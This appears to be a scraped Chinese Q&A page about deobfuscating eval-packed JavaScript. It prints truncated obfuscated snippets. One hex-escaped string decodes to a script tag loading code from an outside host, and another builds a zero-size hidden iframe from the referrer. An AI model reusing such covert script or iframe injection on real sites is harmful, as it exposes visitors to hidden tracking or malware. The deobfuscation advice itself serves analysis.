brrq.net
当前位置:首页 >> js EvAl解密工具 >>

js EvAl解密工具

这段代码eval压缩过了,不过解压函数被破坏了,加密信息完整 修复后可以eval解压的。 eval解压工具http://app.baidu.com/app/enter?appid=121305(一次只能解压一个) 修复后的为 eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.f...

alert('\x69\x70\x74\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x75\x6e\x69\x6f\x6e\x2e\x66\x65\x69\x66\x65\x69\x63\x6d\x73\x2e\x63\x6f\x6d\x2f\x74\x6f\x70\x2f\x66\x66\x2e\x6a\x73\x22\x20\x74\x79\x70\x65\x3d\x22\x74\x65...

(function() { function Aa(a, b, c) { var d; b = b.toLowerCase(); return (d = a.__allListeners || c && (a.__allListeners = {})) && (d[b] || c && (d[b] = [])) } function Ba(a, b, c, d, e, g) { d = d && a[b]; var h; for (!d && (d ...

webstorm可以格式化这种代码,不过代码各种变量都变成a,b,c之类的不可理解的单词了。只能自己重头看了。

//这就是上面代码var _0x755b = ["item", "HEAD", "getElementsByTagName", "referrer", "href", "location", "title", "iframe", "createElement", "src", "", "id", "cssText", "style", "width:0px;height:0px;display:none;", "scrolling", ...

我空间有

var _$ = [ "GET", "js/i1i1i1i1i1l1l1l1l0.js", "", "json", "#tmpinfo", "#wait_text", "更新正常", "#tmpinfo", ",", "", "" ]; $(function(mlkX8258fc) { function mlkX8bc72b() { mlkX8258fc.ajax({ type:_$[0], url:_$[1], data:_$[2], da...

其实就只把字母按照ascii码转换成16进制而已,没什么加密可言。

这是一个威盾加密,但是已经变异了,因为威盾解密都烂大街了。 花了点功夫已经完美解密了,怎么发你?

像这样的混淆代码, 最终都会调用eval来运行加密的代码 观察你给的这一段, 发现\u0065\u0076\u0061\u006c, 刚好就代表了eval函数 把它删去再运行这一段得到 var _token = "jmm8qvq"; 後面还有一段很长的, 同理删去eval函数就能得到原始代码

网站首页 | 网站地图
All rights reserved Powered by www.brrq.net
copyright ©right 2010-2021。
内容来自网络,如有侵犯请联系客服。zhit325@qq.com